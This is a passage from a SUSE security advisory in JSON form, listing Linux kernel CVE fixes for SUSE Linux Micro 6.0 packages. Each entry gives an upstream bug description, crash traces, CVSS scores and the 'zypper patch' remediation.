"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68328",
"url": "https://www.suse.com/security/cve/CVE-2025-68328"
},
{
"category": "external",
"summary": "SUSE Bug 1255489 for CVE-2025-68328",
"url": "https://bugzilla.suse.com/1255489"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68328"
},
{
"cve": "CVE-2025-68330",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68330"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: accel: bmc150: Fix irq assumption regression\n\nThe code in bmc150-accel-core.c unconditionally calls\nbmc150_accel_set_interrupt() in the iio_buffer_setup_ops,\nsuch as on the runtime PM resume path giving a kernel\nsplat like this if the device has no interrupts:\n\nUnable to handle kernel NULL pointer dereference at virtual\n address 00000001 when read\n\nPC is at bmc150_accel_set_interrupt+0x98/0x194\nLR is at __pm_runtime_resume+0x5c/0x64\n(...)\nCall trace:\nbmc150_accel_set_interrupt from bmc150_accel_buffer_postenable+0x40/0x108\nbmc150_accel_buffer_postenable from __iio_update_buffers+0xbe0/0xcbc\n__iio_update_buffers from enable_store+0x84/0xc8\nenable_store from kernfs_fop_write_iter+0x154/0x1b4\n\nThis bug seems to have been in the driver since the beginning,\nbut it only manifests recently, I do not know why.\n\nStore the IRQ number in the state struct, as this is a common\npattern in other drivers, then use this to determine if we have\nIRQ support or not.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68330",
"url": "https://www.suse.com/security/cve/CVE-2025-68330"
},
{
"category": "external",
"summary": "SUSE Bug 1255493 for CVE-2025-68330",
"url": "https://bugzilla.suse.com/1255493"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68330"
},
{
"cve": "CVE-2025-68331",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68331"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: uas: fix urb unmapping issue when the uas device is remove during ongoing data transfer\n\nWhen a UAS device is unplugged during data transfer, there is\na probability of a system panic occurring. The root cause is\nan access to an invalid memory address during URB callback handling.\nSpecifically, this happens when the dma_direct_unmap_sg() function\nis called within the usb_hcd_unmap_urb_for_dma() interface, but the\nsg-\u003edma_address field is 0 and the sg data structure has already been\nfreed.\n\nThe SCSI driver sends transfer commands by invoking uas_queuecommand_lck()\nin uas.c, using the uas_submit_urbs() function to submit requests to USB.\nWithin the uas_submit_urbs() implementation, three URBs (sense_urb,\ndata_urb, and cmd_urb) are sequentially submitted. Device removal may\noccur at any point during uas_submit_urbs execution, which may result\nin URB submission failure. However, some URBs might have been successfully\nsubmitted before the failure, and uas_submit_urbs will return the -ENODEV\nerror code in this case. The current error handling directly calls\nscsi_done(). In the SCSI driver, this eventually triggers scsi_complete()\nto invoke scsi_end_request() for releasing the sgtable. The successfully\nsubmitted URBs, when being unlinked to giveback, call\nusb_hcd_unmap_urb_for_dma() in hcd.c, leading to exceptions during sg\nunmapping operations since the sg data structure has already been freed.\n\nThis patch modifies the error condition check in the uas_submit_urbs()\nfunction. When a UAS device is removed but one or more URBs have already\nbeen successfully submitted to USB, it avoids immediately invoking\nscsi_done() and save the cmnd to devinfo-\u003ecmnd array. If the successfully\nsubmitted URBs is completed before devinfo-\u003eresetting being set, then\nthe scsi_done() function will be called within uas_try_complete() after\nall pending URB operations are finalized. Otherwise, the scsi_done()\nfunction will be called within uas_zap_pending(), which is executed after\nusb_kill_anchored_urbs().\n\nThe error handling only takes effect when uas_queuecommand_lck() calls\nuas_submit_urbs() and returns the error value -ENODEV . In this case,\nthe device is disconnected, and the flow proceeds to uas_disconnect(),\nwhere uas_zap_pending() is invoked to call uas_try_complete().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68331",
"url": "https://www.suse.com/security/cve/CVE-2025-68331"
},
{
"category": "external",
"summary": "SUSE Bug 1255495 for CVE-2025-68331",
"url": "https://bugzilla.suse.com/1255495"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68331"
},
{
"cve": "CVE-2025-68332",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68332"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: c6xdigio: Fix invalid PNP driver unregistration\n\nThe Comedi low-level driver \"c6xdigio\" seems to be for a parallel port\nconnected device. When the Comedi core calls the driver\u0027s Comedi\n\"attach\" handler `c6xdigio_attach()` to configure a Comedi to use this\ndriver, it tries to enable the parallel port PNP resources by\nregistering a PNP driver with `pnp_register_driver()`, but ignores the\nreturn value. (The `struct pnp_driver` it uses has only the `name` and\n`id_table` members filled in.) The driver\u0027s Comedi \"detach\" handler\n`c6xdigio_detach()` unconditionally unregisters the PNP driver with\n`pnp_unregister_driver()`.\n\nIt is possible for `c6xdigio_attach()` to return an error before it\ncalls `pnp_register_driver()` and it is possible for the call to\n`pnp_register_driver()` to return an error (that is ignored). In both\ncases, the driver should not be calling `pnp_unregister_driver()` as it\ndoes in `c6xdigio_detach()`. (Note that `c6xdigio_detach()` will be\ncalled by the Comedi core if `c6xdigio_attach()` returns an error, or if\nthe Comedi core decides to detach the Comedi device from the driver for\nsome other reason.)\n\nThe unconditional call to `pnp_unregister_driver()` without a previous\nsuccessful call to `pnp_register_driver()` will cause\n`driver_unregister()` to issue a warning \"Unexpected driver\nunregister!\". This was detected by Syzbot [1].\n\nAlso, the PNP driver registration and unregistration should be done at\nmodule init and exit time, respectively, not when attaching or detaching\nComedi devices to the driver. (There might be more than one Comedi\ndevice being attached to the driver, although that is unlikely.)\n\nChange the driver to do the PNP driver registration at module init time,\nand the unregistration at module exit time. Since `c6xdigio_detach()`\nnow only calls `comedi_legacy_detach()`, remove the function and change\nthe Comedi driver \"detach\" handler to `comedi_legacy_detach`.\n\n-------------------------------------------\n[1] Syzbot sample crash report:\nUnexpected driver unregister!\nWARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister drivers/base/driver.c:273 [inline]\nWARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister+0x90/0xb0 drivers/base/driver.c:270\nModules linked in:\nCPU: 0 UID: 0 PID: 5970 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nRIP: 0010:driver_unregister drivers/base/driver.c:273 [inline]\nRIP: 0010:driver_unregister+0x90/0xb0 drivers/base/driver.c:270\nCode: 48 89 ef e8 c2 e6 82 fc 48 89 df e8 3a 93 ff ff 5b 5d e9 c3 6d d9 fb e8 be 6d d9 fb 90 48 c7 c7 e0 f8 1f 8c e8 51 a2 97 fb 90 \u003c0f\u003e 0b 90 90 5b 5d e9 a5 6d d9 fb e8 e0 f4 41 fc eb 94 e8 d9 f4 41\nRSP: 0018:ffffc9000373f9a0 EFLAGS: 00010282\nRAX: 0000000000000000 RBX: ffffffff8ff24720 RCX: ffffffff817b6ee8\nRDX: ffff88807c932480 RSI: ffffffff817b6ef5 RDI: 0000000000000001\nRBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000\nR10: 0000000000000001 R11: 0000000000000001 R12: ffffffff8ff24660\nR13: dffffc0000000000 R14: 0000000000000000 R15: ffff88814cca0000\nFS: 000055556dab1500(0000) GS:ffff8881249d9000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000055f77f285cd0 CR3: 000000007d871000 CR4: 00000000003526f0\nCall Trace:\n \u003cTASK\u003e\n comedi_device_detach_locked+0x12f/0xa50 drivers/comedi/drivers.c:207\n comedi_device_detach+0x67/0xb0 drivers/comedi/drivers.c:215\n comedi_device_attach+0x43d/0x900 drivers/comedi/drivers.c:1011\n do_devconfig_ioctl+0x1b1/0x710 drivers/comedi/comedi_fops.c:872\n comedi_unlocked_ioctl+0x165d/0x2f00 drivers/comedi/comedi_fops.c:2178\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_sys\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68332",
"url": "https://www.suse.com/security/cve/CVE-2025-68332"
},
{
"category": "external",
"summary": "SUSE Bug 1255483 for CVE-2025-68332",
"url": "https://bugzilla.suse.com/1255483"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68332"
},
{
"cve": "CVE-2025-68335",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68335"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: pcl818: fix null-ptr-deref in pcl818_ai_cancel()\n\nSyzbot identified an issue [1] in pcl818_ai_cancel(), which stems from\nthe fact that in case of early device detach via pcl818_detach(),\nsubdevice dev-\u003eread_subdev may not have initialized its pointer to\n\u0026struct comedi_async as intended. Thus, any such dereferencing of\n\u0026s-\u003easync-\u003ecmd will lead to general protection fault and kernel crash.\n\nMitigate this problem by removing a call to pcl818_ai_cancel() from\npcl818_detach() altogether. This way, if the subdevice setups its\nsupport for async commands, everything async-related will be\nhandled via subdevice\u0027s own -\u003ecancel() function in\ncomedi_device_detach_locked() even before pcl818_detach(). If no\nsupport for asynchronous commands is provided, there is no need\nto cancel anything either.\n\n[1] Syzbot crash:\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000005: 0000 [#1] SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f]\nCPU: 1 UID: 0 PID: 6050 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025\nRIP: 0010:pcl818_ai_cancel+0x69/0x3f0 drivers/comedi/drivers/pcl818.c:762\n...\nCall Trace:\n \u003cTASK\u003e\n pcl818_detach+0x66/0xd0 drivers/comedi/drivers/pcl818.c:1115\n comedi_device_detach_locked+0x178/0x750 drivers/comedi/drivers.c:207\n do_devconfig_ioctl drivers/comedi/comedi_fops.c:848 [inline]\n comedi_unlocked_ioctl+0xcde/0x1020 drivers/comedi/comedi_fops.c:2178\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68335",
"url": "https://www.suse.com/security/cve/CVE-2025-68335"
},
{
"category": "external",
"summary": "SUSE Bug 1255480 for CVE-2025-68335",
"url": "https://bugzilla.suse.com/1255480"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68335"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
